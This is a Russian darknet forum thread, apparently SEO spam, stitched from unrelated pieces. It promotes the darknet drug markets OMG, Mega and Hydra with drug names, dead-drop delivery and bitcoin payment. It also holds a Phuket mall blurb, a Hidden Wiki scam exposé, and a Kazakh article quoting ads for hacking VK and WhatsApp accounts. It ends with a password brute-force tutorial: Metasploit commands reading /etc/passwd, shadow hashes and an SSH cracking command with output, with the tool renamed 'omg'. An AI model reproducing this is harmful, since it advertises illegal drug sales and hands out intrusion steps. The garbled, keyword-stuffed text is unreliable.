Как пользоваться тор ramp

Zavuni

Модератор
Подтвержденный
Сообщения
683
Реакции
27
Уважаемые пользователи RuTOR , Все сайты из нашего списка проверены и находятся онлайн, их нет в скам листах. Остерегайтесь фишинг сайтов и помните об уголовной ответственности за незаконные сделки. Подборка официальных сайтов по продаже веществ от форума Rutor носит исключительно информативный характер.

1. OMG!OMG - MOST ADVANCED DARKMARKET

Эта площадка существует довольно давно и в этот период она медленно развивалась в тени гидры. В настоящее время это ведущий сайт по продаже веществ в даркнете.
 

 

2. MEGA - DARKNET MARKET

Благодаря хорошей подготовке и листингу на зарубежных сайтах площадка смогла составить конкуренцию в стабильности и доступности, чего не смогли ее конкуренты, но все же она уступает по полпулярности площадке OMG!OMG!

 

3. HYDRA - Возрождение легенды.

Идут работы по восстановлению всеми любимой гидры, но все не так просто как казалось ранее, совсем скоро она будет доступна, а сейчас нам остается только ждать релиза от команды HYDRA.

 

________________________
RUTOR — Главная торговая и информационная площадка в сети Tor.



A

Asipumy

Юзер
Сообщения
47
Реакции
22
Как пользоваться тор ramp
Porto ssylka de Phuket is the first and finest Open – Air Lifestyle Retail that combines design, lifestyle and natural elements. Come and experience a diverse selection of activities available. Enjoy shopping at trendy войти lifestyle stores, acclaimed restaurants offering exceptional dishes from across Thailand or avant-garde international gastronomy. Relaxing with family entertainment including Healthy Heaven and dedicated kids’zone that all can enjoy. It is a magnificent reflection of Phuket’s social and cultural life. Porto de Phuket is a part of the Central Group, one of Thailand’s largest and most esteemed retail conglomerates.BrandsPromotion & Event тор
 
D

Diculepu

Юзер
Сообщения
63
Реакции
1
Правильные линки маркетплейса помогают попасть на сайт ОМГ в том числе и через обычный браузер в обход блокировки..ссылка на сайт omgomg union официальныйОМГ onion ссылка на моментальные магазины в TORПлощадка с закладками повсюду: в джабере, в onion, в клирнете.Спам который вы хотели: бошки, гашиш, гаш, ск, скорость кристаллы, мефедрон, — это и многое другое в продаже на официальном сайте магазина omg.union omg зеркалаомг официальный сайт ссылкаomg магазинomgomg union ссылка торomgruzxpnew4af зеркала рабочиеomg onion.ru официальный сайтссылка на omgсайт omgomg union ссылка торГдов, Белоозёрский, Абдулино, Ивдель, Гурьевск, Струнино, Сунжа, Вихоревка, Сретенск, Озёры, Ермолино, Жуковский, Мензелинск, вся Россия и СНГ.Магазин наркотиков ОМГ — платформа нового поколения.ОМГ ТORговая площадкаСсылки omgomg Onion (площадка ОМГ онион) — уникальная торговая площадка в сети TOR. Маркет работает по всей территории РФ, Беларусии, Украины, Казахстана функционирует 24 часа в сутки, без выходных, постоянная онлайн поддержка, гарант, автоматизированные продажи с опалтой киви или биткоин.ОМГ полностью анонимна и написана на современных языках программирования.Главная проблема при регистрации на гидре - это поиск официальной ссылки. Помимо tor ссылки, есть ссылка на гидру без тора.Основные преимущества сайта ОМГ заключаются в том, что:omg — самый удобный и безопасный торговый центр для покупок наркотиков;Маркетплейс самый популярный в России, СНГ и за границей. Есть несколько главных различий, в сравнении с другими сайтами, благодаря которым покупатели выбирают именно Гидру;Отсутствуют критичные уязвимости в безопасности (по заявлению администрации торговой площадки Гидрв);Вы можете завести собственный биткоин-кошелек, а также есть обменник биткоина (qiwi/bank/sim в bitcoin);Сайт обладает самой современной системой анонимности. За все время существования Площадки не было ни одной утечки личных данных покупателей и продавцов сайта.Разместил: Админимтратор 30.09.2019 в 15:44Постоянно появляются новые инструменты, позволяющие пользоваться интернетом анонимно и безопасно.В следствии чего были созданы онион-сайты (ссылки, находящиеся в домен-зоне onion).Из приятных нововведений:не надо ожидать подтверждения транзакции в блокчейне;возможность быстро и удобно найти необходимый товар;оплатить товар можно с тинькова;покупки можно делать моментально;вся информация зашифрована;есть функционал чтобы открыть диспут если заказ был исполнен неудовлетворительно;Правильная ссылка на гидруКак уже было отмечено, площадка ОМГ – гигантский центр наркоторговли в тор браузере. На этом сайте есть возможность купить то, что в открытом доступе купить невероятно сложно или невозможно совсем. Каждый зарегистрированный пользователь может зайти в любой из существующих на маркетплейсе шопов и купить запрещенный товар, организовав его доставку в города России и страны СНГ. Заказ возможен в любое время суток из любого уголка земли, где есть интернет. Особое преимущество Гидры это систематическое и регулярное пополнение товаров магазинов.Подобрать и купить товар или услугу не составит никакого труда. Перед заказом можно ознакомиться с отзывами настоящих покупателей, купивших товар. Поэтому покупатель может заблаговременно оценить качество желаемого товара и решить, нужен ему продукт или все же от его приобретения стоит отказаться. Особенность закрытого маркетплейса в наличии службы тайных покупателей. Они следят за тем, чтобы вещества, которые выставлены на витрины соответствовали заявленным требованиям и даже делают в некоторых случаях химический анализ продаваемых веществ. Если по непонятным причинам находится несоответствие качеству товара, товар моментально снимают с витрины, продавца блокируют, магазин получает штраф.Доставку любого товара можно заказать в любой город России и СНГ, указав адрес, где будет удобно забрать клад. Покупка передается в виде клада. После того, как покупатель подтвердит доставку заказа, убедится в качестве продукта селлер получит свои монеты. Если с качеством или доставкой в момент проверки возникли проблемы, клиент может открыть спор, к которому сразу же подключатся независимые модераторы Площадки. Оплата товаров производится в биткоинах, и, в большинстве случаев, Магазины предпочитают принимать оплату биткоинами. Однако некоторые продавцы готовы принять оплату рублями через КИВИ кошелек. Сами сотрудники портала советуют производить оплату биткоинами, так как это самый безопасный способ оплаты, который также позволяет сохранить приватность совершаемых операций.Что такое TOR-Браузер и зачем он нуженTOR — это военная разработка, которая позволяет скрыть личность человека во всемирной сети Интернет. Расшифровывается "TOR" как The Onion Router — луковый маршрутизатор.Изначально ТОР был военным проектом Америки, но в скором времени его представили для спонсоров, и с тех пор он именуется Tor Project. Главная идея этого проекта — обеспечение анонимности и безопасности в сети, где большинство участников не верят друг другу. Смысл этой сети в том, что трафик следует через несколько компьютеров, шифруется, у них меняется исходящий IP и вы получаете зашифрованный канал передачи данных.Что обязательно надо учитывать при работе с Гидрой?От недобросовестных сделок с различными магазинами при посещении маркетплейса не застрахован ни один покупатель.Поэтому администраторы Гидры рекомендуют:смотреть на отзывы. Отзывы клиентов это важный критерий покупки. Мнения других покупателей могут повлиять на окончательное решение о приобретении товара или закладки. Благодаря оставленным отзывам можно узнать о качестве стаффа, способах доставки и других особенностях сотрудничества с магазином;завершать заказ только после того, как будет подтверждено ее наличие и качество. Если образовались сложности или проблемы, а подтверждение уже сделано, в таком случае деньги не удастся вернуть;оставлять отзывы после покупок. Это может помочь другим покупателям совершить правильный выбор и не совершить ошибку при выборе товара;использовать абсолютно новые пароли и логины для каждого пользователя перед регистрацией. Желательно, чтобы пароли и логины не были ранее использованы на других сайтах. Это позволит следовать принципам анонимности и безопасности;Выброс адреналина приводит к ускорению сердцебиения, движения стают наименее точными, что у алкоголиков под влиянием препаратов цинка (4 атома цинка входят в молекулу фермента алкогольдегидрогеназы) скорее проходили явления алкогольного отравления.Обращаем ваше внимание, что регулярно домен Гидры обновляется ее Администрацией. Дело в том, что сайт почти каждый день блокируют, и пользователю в результате не получается войти на страницу входа, не зная рабочих ссылок. Дабы избежать эту проблему, Администраторы и Модераторы портала призывают добавить официальную страницу Гидры в закладки браузера. Сохрани себе все ссылки на Гидру и делись ими со своими друзьями.Соискатель на должность кладмена должен зарегистрироваться для того, чтобы пользоваться всеми возможностями Маркетплейса ОМГ.Когда модератор одобрит регистрацию пользователя, он получит доступ к правилам пользования площадки. Также сразу после входа он получит возможность внести деньги на баланс личного счета, чтобы тут же приступить к покупкам.Пополнение баланса на omg marketplace требует отдельного внимания. Дело в том, что для поплнения баланса стандартной валюты площадки – Биткоин – требуется сначала купить фиат, который впоследствии нужно будет обменять на биток. Приобрести его можно либо на криптовалютной бирже, либо в специальном пункте обмена.Когда фиат будет приобретен и обменен на определенное количество BTC, останется перевести их в систему. Чтобы это сделать, необходимо скопировать адрес биткоин кошелька, который был выдан при регистрации, и отправить на него требуемую сумму с помощью использования различных платежных систем (например, КИВИ). Также обменять рубли на биткоин можно на самой площадке магазина в специальном разделе «обмен».Как не попасть в лапы злоумышленниковДля защиты от мошеннических сайтов, была разработана сеть отказоустойчевых зеркал.Чтобы не попасть на мошеннические сайты сохрани ссылку зеркала на этот сайт в закладки. Скопируйте все рабочие ссылки с этого сайта к себе на компьютер так как Роскомнадзор может заблокировать сайт.
Read moreПредыдущая страница: сайт омг магазинСледующая страница: сайт омг тор браузера ссылкаКомментарии (Всего 4 комментариев):(1) 17.02.2020 в 06:05 Харитон:
В этом что-то есть. Спасибо за помощь в этом вопросе, может я тоже могу Вам чем то помочь?(2) 20.02.2020 в 01:53 Каролина:
НЕ слышал такого(3) 20.02.2020 в 03:28 Алиса:
Поздравляю, какой отличный ответ.(4) 20.02.2020 в 05:08 oollenmo:
Прошу прощения, что вмешался... Я здесь недавно. Но мне очень близка эта тема. Пишите в PM.
Как пользоваться тор ramp
 

Guhefy

Продвинутый юзер
Сообщения
39
Реакции
15
Наверняка каждый из вас, кто сталкивался с сетью TOR, слышал о The Hidden Wiki. The Hidden Wiki — это основной каталог ресурсов .onion в самых разных областях. Что важно отмечено создателями — размещаемые ссылки в каталоге не проходят никакой цензуры, однако на самом деле это не так, но об этом позже. Многие, кто впервые начинают пользоваться сетью TOR, изначально обращаются к Hidden Wiki и начинают изучение сети Onion именно отсюда. В этой статье я расскажу, как Hidden Wiki обманывает пользователей и монетизирует весь свой трафик.

Немного истории
Изначально первые версии Hidden Wiki появились в 2005-2007 годах и размещалась по адресу 6sxoyfb3h2nvok2d.onion. Позднее в 2009 году Hidden Wiki была перезапущена и ее адрес стал kpvz7ki2v5agwt35.onion. В марте 2014 года домен был взломан и перенаправлял всех на сайт Doxbin, а в ноябре 2014 года сайт показывал сообщение об аресте домена. После этих событий сайт снова переезжает и становится доступен по адресу zqktlwi4fecvo6ri.onion, где находится и по сей день. Именно об этой версии Hidden Wiki я и буду говорить далее. А сейчас сайт переживает новые времена и уже доступна его новая версия по адресу gxamjbnu7uknahng.onion. Именно на эту версию сейчас ведет Российская Википедия. Так же хочу отметить, что на протяжении существования The Hidden Wiki существовало множество клонов и копий этого сайта, которые не имели отношения к основному каталогу. Так же нельзя доподлинно утверждать, что текущей версией The Hidden Wiki владеют те же люди, что ее создали. Вполне возможно, что каждый переезд The Hidden Wiki был связан с изменением его основных владельцев.The Hidden Wiki — большое мошенничество
Я буду рассматривать версию zqktlwi4fecvo6ri.onion, которая была доступная с конца 2014 по текущее время, и которая сейчас медленно умирает. Учитывая, что перенаправление с домена kpvz7ki2v5agwt35.onion сейчас ведет именно на эту версию, а домен kpvz7ki2v5agwt35.onion являлся основным с 2009 года, можно с 99% вероятностью, сказать что версия 2009 и 2014 года имеет одних владельцев.Регистрация
На сайте Hidden Wiki главная страница сайта закрыта для редактирования. Для того, что бы иметь возможность её редактировать, надо зарегистрироваться и войти в группу autoconfirmed users. Администрацией ресурса изначально заявлено, что с момента регистрации до вступления в группу autoconfirmed проходит 24 часа. В середине ноября 2014 года, зарегистрировав пользователя на Hidden Wiki, я получил статус autoconfirmed где-то к концу декабря 2014 года. Тогда процесс получения статуса занимал ~1 месяц. Статус получался автоматически просто по прошествии времени. С июля-сентября 2015 года администраторы The Hidden Wiki решили не пускать новых людей к возможности вносить изменения в Wiki и учетная запись зарегистрированная в ноябре 2015 года до сих пор находится в статусе не подтвержденной.После прохождения этапа регистрации в декабре 2014 я разместил в каталоге Hidden Wiki несколько ссылок на свои ресурсы. К некоторым ссылкам в описании я указал, что готов использовать «Escrow» (гаранта для проведении сделки). Мои ссылки были успешно размещены, но именно это описание было удалено, администрация ресурса объяснила это так: «Все пользователи Hidden Wiki должны находиться в равных условиях». На мой вопрос почему у ссылок, размещенных на первых позициях, есть возможность писать про Escrow, а у меня нет, мне не объяснили.Balkanm
Сразу после Нового Года 10 января 2015 года все мои ссылки начинают удаляться из Hidden Wiki не известными мне пользователями, попытки восстановить их ни к чему не приводят, администрация не обращает никакого внимания на происходящее. Тут же на странице моего профиля в Hidden Wiki мне пишет пользователь Balkanm и просит связаться с ним в torchat по адресу ayertivdautoe3fc. Balkanm является одним из администраторов Hidden Wiki:В переписке в TorChat мне ставят жёсткие условия: у меня есть 24 часа, чтобы перевести 5 BTC, взамен администрация разместит мои ссылки на позициях с 8 по 11 и обещает полное покровительство и защиту от вандализма, а в случае отказа — все мои ссылки будут удалены. 5 BTC на тот момент равнялось ~1500$. При этом администрация на официальных страницах заявляла, что не берет платы за размещение ссылок и никакой цензуры в Hidden Wiki нет. Я согласился и выполнил условия.Позже мне удалось узнать следующие вещи.Все ссылки, которые были размещены в Hidden Wiki на первых местах, принадлежали Balkanm. Balkanm принадлежал магазин продажи карт (http://slwc4j5wkn3yyo5j.onion/ — Premium Cards), магазин электроники (ftec4org3hcpnoir.onion — Apple Palace), свой Escrow сервис BigEscrow (k5vbzl3ucwsjf2ye.onion), и так далее. За 50% от суммы каждой моей продажи Balkanm предложил мне услуги своего Escrow сервиса. Деньги покупателя, естественно, было предложено делить между собой. Уже давно было понятно, что администрация Hidden Wiki занимается обманом наивных пользователей. Так же одним из доказательств того, что все эти сервисы принадлежат одному человеку, стал неожиданной найденный mod_status на этих мошеннических сайтах. На нем было наглядно видно, что все эти сервисы содержаться на одном сервере:Схема работала просто: администраторы имели достаточно большой трафик новых пользователей, которые слышали о Hidden Wiki как о крупнейшем проверенном ресурсе, и решили монетизировать этот трафик. Добавили в каталог на первые места свои ресурсы (фальшивые деньги, карты, наркотики, и т.д.), и создали липовый Escrow сервис. Пользователи сами предлагали воспользоваться услугами этого Escrow сервиса. По моим приблизительным оценкам, ежемесячный доход Balkanm составлял более 50 000$. Дополнительно к этому можно добавить доход от покровительства новых пользователей.Передел рынка и жадность
В июне 2015 все мои ссылки из Hidden Wiki были снова удалены. Администрация больше не хотела денег, было удалено множество других ссылок других пользователей, так же были удалены не профильные и не особо прибыльные разделы (педофилия, наркотики и прочее). С июня 2015 администрация перестала давать права новым пользователям на редактирование главной страницы. Основная причина — они не хотели иметь конкуренции, и хотели получать как можно больше денег от новых пользователей на своих ресурсах. Новым модератором был назначен Zayaya, основной задачей которого стало удаление новых ссылок, размещаемых старыми пользователями, хотя он и не был включен в административную группу.Недавно была создана еще одна вики по адресу gxamjbnu7uknahng.onion, ссылки на которую сейчас активно появляются и удаляются в старой вики. Кем и с какой целью была создана еще одна Hidden Wiki — пока не известно. Был ли это раскол внутри администрации прошлой вики или же новую вики создали недовольные владельцы onion ресурсов, теряющие трафик, пока остается загадкой.Вывод из всего этого напрашивается один: не доверяйте ничему, что размещают на Hidden Wiki, в большинстве случаев это мошенничество, а Escrow сервисы, которые должны помочь вам сохранить ваши средства, лишь помогают их быстрее украсть.
 

Wipikut

Продвинутый юзер
Сообщения
72
Реакции
8
Массовая блокировка интернет-ресурсов и социальных сетей в Казахстане дала противоположный эффект — люди научились пользоваться VPN и открыли для себя ДаркнетСОДЕРЖАНИЕ  ЧТО ТАКОЕ DARKNETЗаблокированный в Казахстане, как и во многих странах DarkNet с английского можно перевести как «Скрытая сеть», «Тёмная сеть», «Теневая сеть» или «Тёмный веб». Туда невозможно попасть через обычные интернет-браузеры: необходимо устанавливать специальное программное обеспечение. Одной из самых популярных программ, сохраняющих анонимность пользователя и  позволяющих проникнуть в Даркнет, является Tor (сокр. от англ. The Onion Router) — также заблокирован в Казахстане.Tor (The Onion Router)  — это overlay-сеть, которая предоставляет более широкие возможности, изначально не предусмотренные разработчиками классических сетевых протоколов (TCP/IP). По сути Tor это система анонимизации серверов, которая позволяет скрыть истинное их местонахождение с помощью специального программного обеспечения. Сеть Tor построена таким образом, чтобы никто не имел возможности различать пользователей и не собирать их персональных данных.Довольно часто термин «даркнет» используют как взаимозаменяемый с «дарквеб» (от англ. dark web, «темная паутина»). Под дарквебом понимается та часть World Wide Web, доступ к которой можно получить через оверлейные сети, то есть — собственно «даркнеты».Иногда даркнет (дарквеб) путают с так называемой глубокой сетью (deep web) — веб-страницами, не индексируемыми поисковыми системами. В отличие от даркнета, для получения доступа к глубокой сети не требуются специфические программные средства.Полной противоположностью даркнету служит так называемая видимая или верхняя сеть — часть интернета, индексируемая поисковыми системами и находящаяся в открытом доступе.Однако, работа с программами типа Tor удобна не для всех и имеет свои ограничения. Поэтому некоторые из даркнетовских ресурсов все активнее эксплуатируют мессенджер Telegram, а последний все глубже интегрируется в «темную сеть». Эту сеть используют самые разные люди и организации с самыми разными целями. Одни — для планирования и координации преступлений, другие — для обхода политической цензуры и помощи жертвам политического террора, третьи — для обеспечения неприкосновенности частной жизни. ПОЛИТИКА И НАРКОТИКИХоть даркнет широко стал известнет в Казахстане со времен неофициальных вечерних блокировок социальных сетей и портала с целью пресечь антиправительственную пропаганду, во всем мире его начали широко использовать задолго до этого. Пионерами здесь являются представители наркобизнеса.По словам Руслана Дайырбекова из Евразийского Цифрового Фонда, в 80–90 % случаев для покупки наркотиков в Казахстане используют международную русскоязычную даркнет-платформу omg. Помимо этого здесь продают и покупают поддельные документы, фальшивую валюту, хакерские услуги и другие нелегальные вещи. На 2019 год на этом ресурсе было зарегистрировано 2,5 миллиона аккаунтов.  omg — это целая система. Там есть своя наркологическая служба, юридическая служба, техническая поддержка со своими правилами и законами.Помимо непосредственной продажи своей продукции наркодилеры публикуют здесь вакансии, нанимают на работу курьеров, закладчиков наркотиков, художников, которые рисуют по городу опознавательные знаки. ДЕНЕЖНЫЕ ПОТОКИЧто же касается Казахстана, то Елжан Кабышев из проекта ifkz.org приводит такие цифры:«Telegram: в воскресенье вечером в трех наркоманских чатах суммарно 29 тысяч сообщений, онлайн 160 человек, средний чек от 5 до 20 тысяч тенге, вот и считайте примерную конверсию в продажи в деньDarkNet: точную цифру подсчитать практически невозможно. Но на ресурсе omg можно просмотреть количество совершенных сделок по магазину. В больших магазинах количество сделок 50 000+, минимальная сумма товара 2 600 тенге, без учета НДС комиссии, переводов, конвертации в биткоин. На один магазин условно с учетом этих данных совершилось сделок на сумму около 130 000 000 тенге (50 000 сделок * 2 600 тенге мин. сумма заказа). Сумма весьма условная.По Алматы таких магазинов (без учета Telegram, только на omg) 503. В Астане — 345. Могут быть и междугородние магазины. Также имеются магазины в других городах Казахстана». УСЛУГИ ХАКЕРОВЕще в Казахстане пользуется спросом приобретение украденных баз данных, содержащих личные конфиденциальные сведения о гражданах. За что согласно статье 211 Уголовного Кодекса РК можно сесть в тюрьму на семь лет. Поэтому злоумышленники занимаются этим в Даркнете. Там то и дело публикуется реклама услуг по взлому чужих аккаунтов. Цена оговаривается индивидуально, но в среднем стоит  от 20 тысяч тенге. Но авторы таких объявлений могут кинуть. Серьезные специалисты, занимающиеся взломом чужих почтовых ящиков и аккаунтов и похищением конфиденциальных данных, назначают цену за свои услуги в пределах 150 тысяч тенге. Взлом уже корпоративной почты обойдется в среднем 500 долларов.Размещаются объявления примерно такого содержания:Взлом аккаунта Вконтакте!!!Заказывая у нас взлом аккаунтов vk.com вы получаете:
* Логин и пароль для входа в аккаунт пользователя
* Гарантию три недели на логин и пароль  (если пользователь сменит пароль в этот период повторная услуга бесплатно) 
* Гарантированную анонимность  (это наш приоритет, для нашей команды, нет нечего важнее чем, безопасность и абсолютная анонимность наших клиентов)
* Быстрый и качественный результат  (у нас есть, глубокое понимание того, что время деньги, мы дорожим вашим и нашим временем)
* Подробную инструкцию безопасности  (самая полная и на сто процентов понятная инструкция по безопасности)Заказать взлом whatsapp!!!Работая с нами Вы получите:
Архив сообщений в текстовом формате.                                                           
*(Архив - История всех сообщений пользователя за все существования аккаунта, в том числе и удаленных!)
Переадресация сообщений и звонков.
*(Переадресация это - Вам и взломанному пользователю будут приходить сообщения одновременно.) При звонках лучше не отвечать!!!!Полную анонимность при работе с нами
Инструкцию ----- SLIDER STARTS HERE ---------- SLIDER ENDS HERE ----- РЕАКЦИЯ ГОСУДАРСТВАКак пояснил Руслан Дайырбеков, в Республике Казахстан на  законодательном уровне не установлены ограничения использования подобных технологий по доступу к анонимным и децентрализованным сетям. Однако существует Концепция кибербезопасности («Киберщит Казахстана»). И согласно Концепции к одной из ключевых проблем относятся «ограниченные возможности органов правопорядка по привлечению к ответственности виновных в совершении высокотехнологичных преступлений, несмотря на развитые уголовно-правовые институты информационной безопасности».Кроме того, прошлом году сайт проекта torproject.org был заблокирован в Казахстане по причине того, что данное ПО дает возможность обхода связи и технических ограничений операторов связи. ОПАСНОСТИ ДЛЯ ПОЛЬЗОВАТЕЛЯДаркнет дает человеку много возможностей, но и опасностей таит немало.  Программист проекта ifkz.org Анвар Умаров предупреждает, в самом Даркнете идет охота за личными данными пользователей. Даркнет привлекает обещанием полной анонимности. Но есть нюансы. Владелец прокси-сервера или VPN может видеть входящие запросы и IP-адреса, если они не зашифрованы. А шифруются они при помощи отдельного ПО и не всякий сможет это сделать. В то время, как человек пребывает в уверенности, что он полностью анонимен, его личные данные уже висят в какой-нибудь базе на продажу.  Соответственно, можно легко оказаться жертвой шантажа. Поэтому простому обывателю, слабо разбирающемуся в информационных технологиях и угрозах, стоит несколько раз подумать прежде чем нырять в глубины «Темной сети».  Иллюстрации: Анар Бакенова
 
Z

Zajumi

Продвинутый юзер
Сообщения
78
Реакции
24
ContentsWe will use omg to brute-force SSH logins.UsageIf we just type omg, we can see the basic usage:[email protected]:~# omg omg v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Syntax: omg -l LOGIN -P FILE [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]Options: -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE -p PASS or -P FILE try password PASS, or load several passwords from FILE -C FILE colon separated "login:pass" format, instead of -L/-P options -M FILE list of servers to attack, one entry per line, ':' to specify port -t TASKS run TASKS number of connects in parallel (per host, default: 16) -U service module usage details -h more command line options (COMPLETE HELP) server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option) service the service to crack (see below for supported protocols) OPT some service modules support additional input (-U for module help)Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3-{cram[s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmppomg is a tool to guess/crack valid login/password pairs. Licensed under AGPLv3.0. The newest version is always available at http://www.thc.org/thc-omgDon't use in military or secret service organizations, or for illegal purposes.Example: omg -l user -P passlist.txt ftp://192.168.0.1ProcedureCracking with omg proceeds as follows:Get a host or list of hosts to attackGet a username or list of usernames from the host to try and crackGet a wordlist or list of passwords to tryRun omgThe ideal scenario is that we can brute force an SSH login for the root user. However, many OpenSSH servers disable root login by default. To be successful, we will need to obtain or guess a username or list of users on the system.This can be done in a couple of different ways.Two methods that utilize SQL servers are covered in Metasploitable/MySQL and Metasploitable/Postgres. Both pages cover techniques for obtaining /etc/passwd contents with metasploit.Another method that will tell you which users can log in remotely and which cannot is to obtain the /etc/shadow file. However, if you have /etc/shadow, you can just crack the passwords offline with John the Ripper, so...... don't use omg if you have /etc/shadow.There are other techniques that don't rely on technology - using social engineering, for example, to figure out the schema used for usernames.Once you have a list of users, you'll need some wordlists to construct passwords to try.Step by StepObtaining UsernamesIf you do happen to have access to /etc/passwd and the list of users on the system, this is idea. Here's a recap of how to get the contents of that file from the MySQL server. Here, we're using a username of root and a password of (blank) to crack the MySQL server at 10.0.0.27:[email protected]:~# msfconsolemsf > use auxiliary/admin/mysql/mysql_sqlmsf auxiliary(mysql_sql) > set USERNAME rootUSERNAME => rootmsf auxiliary(mysql_sql) > set PASSWORD ''PASSWORD =>msf auxiliary(mysql_sql) > set RHOST 10.0.0.27RHOST => 10.0.0.27msf auxiliary(mysql_sql) > set SQL select load_file(\'/etc/passwd\')SQL => select load_file('/etc/passwd')msf auxiliary(mysql_sql) > run[*] Sending statement: 'select load_file('/etc/passwd')'...[*] | root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shdhcp:x:101:102::/nonexistent:/bin/falsesyslog:x:102:103::/home/syslog:/bin/falseklog:x:103:104::/home/klog:/bin/falsesshd:x:104:65534::/var/run/sshd:/usr/sbin/nologinmsfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bashbind:x:105:113::/var/cache/bind:/bin/falsepostfix:x:106:115::/var/spool/postfix:/bin/falseftp:x:107:65534::/home/ftp:/bin/falsepostgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bashmysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/falsetomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/falsedistccd:x:111:65534::/:/bin/falseuser:x:1001:1001:just a user,111,,:/home/user:/bin/bashservice:x:1002:1002:,,,:/home/service:/bin/bashtelnetd:x:112:120::/nonexistent:/bin/falseproftpd:x:113:65534::/var/run/proftpd:/bin/falsestatd:x:114:65534::/var/lib/nfs:/bin/falsesnmp:x:115:65534::/var/lib/snmp:/bin/false |[*] Auxiliary module execution completedBingo, now you have a list of users. Some of these may not be set up to log in remotely, but you'd be surprised. Most of the users also have a bash shell set!Reading /etc/shadowIf you have access to /etc/shadow, you have access to the encrypted passwords offline. DON'T USE omg! It is way, way slower to crack passwords online with a live system than it is to crack them offline. If you have /etc/shadow, use John the Ripper to crack passwords.Her's how to read the /etc/shadow file:root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::daemon:*:14684:0:99999:7:::bin:*:14684:0:99999:7:::sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::There are 8 fields per line:Username : It is the login name.Password : It is the encrypted password. The password should be minimum 6-8 characters long including special characters/digits and more.Last password change (lastchanged) : Days since Jan 1, 1970 that password was last changedMinimum : The minimum number of days required between password changesMaximum : The maximum number of days the password is valid (after that user is forced to change his/her password)Warn : The number of days before password is to expire that user is warned that his/her password must be changedInactive : The number of days after password expires that the account is disabledExpire : days since Jan 1, 1970 that account is disabled i.e. an absolute date specifying when the login may no longer be used.The most important two fields are the first two:root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::daemon:*:14684:0:99999:7:::bin:*:14684:0:99999:7:::sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::The root and sys users can both log in, and we have the hash of their passwords.However, the * (or a ! character) in place of a password hash means that account cannot be used for remote logins.This reduces the list of usable usernames to:[email protected]:~# cat users_filerootsysklogmsfadminpostgresuserserviceStartCommand Line OptionsRunning omg requires specifying a few flags, and the flags depend on whether you are trying a single username/password or multiple usernames/passwords.Single username/single password:-l to specify a single login username-p to specify a single passwordMultiple usernames/multiple passwords:-L to specify a file with a list of usernames-P to specify a file with a list of passwords to tryYou can also specify a number of tasks to run in parallel:-t TASKS to specify how many tasks to run in parallel (default is 16)You must also specify the target machine address, and the protocol (ssh or something else), all on the command line.$ omg -l root -P /root/password.txt 192.168.0.128 sshCommand Line CommandHere's an example of a final command:# omg -L users_file -P 500-worst-passwords.txt ssh://10.0.0.27:22omg v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.omg (http://www.thc.org/thc-omg) starting at 2016-03-25 21:45:13[WARNING] Restorefile (./omg.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...[DATA] max 4 tasks per 1 server, overall 64 tasks, 3549 login tries (l:7/p:507), ~13 tries per task[DATA] attacking service ssh on port 22[STATUS] 44.00 tries/min, 44 tries in 00:01h, 3505 todo in 01:20h, 4 activeThis is extremely slow when compared to an offline password-cracking method like John the Ripper - online cracking should only be used as a last resort. If it is possible to obtain the password hashes from /etc/shadow or elsewhere, and crack offline, do that instead.Brute-forcing SSH logins requires a lot of time, a lot of patience, and a series of very good guesses. In general, it is not a terribly practical way to do it, unless you've got extra/insider information.omg is not just for cracking SSH servers. The following is a list of other protocols that can be cracked using omg:afpciscocisco-enablecvsfirebirdftphttp-gethttp-headhttp-proxyhttps-gethttps-headhttps-form-gethttps-form-posticqimapimap-ntlmldap2ldap3mssqlmysqlncpnntporacle-listenerpcanywherepcnfspop3pop3-ntlmpostgresrexecrloginrshsapr3sipsmbsmbntsmtp-authsmtp-auth-ntlmsnmpsocks5ssh2teamspeaktelnetvmauthdvncDr. Chaos guide to using omg: http://www.drchaos.com/breaking-ssh-vnc-and-other-passwords-with-kali-linux-and-omg/
 

Похожие темы

Сверху Снизу